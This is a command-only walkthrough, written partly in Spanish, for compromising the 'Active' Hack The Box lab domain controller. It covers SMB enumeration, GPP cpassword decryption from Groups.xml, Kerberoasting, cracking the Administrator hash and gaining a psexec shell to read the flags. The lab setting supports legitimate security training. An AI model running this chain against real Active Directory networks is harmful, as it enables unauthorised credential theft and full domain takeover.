Active
Hola, esta es la máquina Active! Let’s hack!
RECON
ping -c 1 <IP>
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn <IP> -oG ports
extractports <ports>
nmap -sCV <PORTS> -oG services
AD DOMAIN DETECTION
crackmapexec smb <IP>
sudo su
nvim /etc/hosts
<IP> <DOMAIN>
SMB ENUM
smbclient -L <IP> -N
crackmapexec smb <IP> --shares
smbmap -H <IP>
smbmap -H <IP> -r Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/
smbmap -H <IP> --download Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
mv <IP>-Replication_active.htb_Policies_{31B2F340-016D-11D2-945F-00C04FB984F9}_MACHINE_Preferences_Groups_Groups.xml groups.xml
DECRYPT GROUPS.XML PASSWORD
gpp-decrypt '<CPASSWORD>'
GRANTED SMB ACCESS SVC_TGS USER
crackmapexec smb <IP> -u 'SVC_TGS' -p '<PASSWORD>'
crackmapexec smb <IP> -u 'SVC_TGS' -p '<PASSWORD>' --shares
smbmap -H <IP> -u 'SVC_TGS' -p '<PASSWORD>' -r Users/SVC_TGS/Desktop/user.txt
FLAG USER.TXT
smbmap -H <IP> -u 'SVC_TGS' -p '<PASSWORD>' --download Users/SVC_TGS/Desktop/user.txt
mv <IP>-Users_SVC_TGS_Desktop_user.txt user.txt
cat user.txt
AD ENUM RPCCLIENT
rpcclient -U "SVC_TGS%<PASSWORD>" <IP>
rpcclient -U "SVC_TGS%<PASSWORD>" <IP> -c 'enumdomusers'
rpcclient -U "SVC_TGS%<PASSWORD>" <IP> -c 'enumdomgroups'
rpcclient -U "SVC_TGS%<PASSWORD>" <IP> -c 'querygroupmem 0x200'
rpcclient -U "SVC_TGS%<PASSWORD>" <IP> -c 'queryuser 0x1f4'
rpcclient -U "SVC_TGS%<PASSWORD>" <IP> -c 'querydispinfo'
echo SVC_TGS > users.txt
AD TGT GETNPUSERS.PY
GetNPUsers.py active.htb/ --no-pass -usersfile users.txt
AD USER ENUM KERBRUTE
kerbrute userenum --dc <IP> -d active.htb /usr/share/Seclists/Usernames/Names/names.txt
ADJUST DATE & TIME WITH AD (OPTIONAL)
ntpdate <IP>
AD TGS GETUSERSPN.PY
GetUserSPN.py active.htb/SVC_TGS:<PASSWORD> -request
BRUTEFORCE ADMINISTRATOR HASH
echo '<HASH>' > hash
john -w:/usr/share/wordlists/rockyou.txt hash
GRANTED ACCESS ADMINISTRATOR USER
crackmapexec smb <IP> -u 'Administrator' -p '<PASSWORD>'
psexec.py 'active.htb/Administrator:<PASSWORD>@<IP>' cmd.exe
whoami
FLAG ROOT.TXT
type C:\Users\Administrator\Desktop\root.txt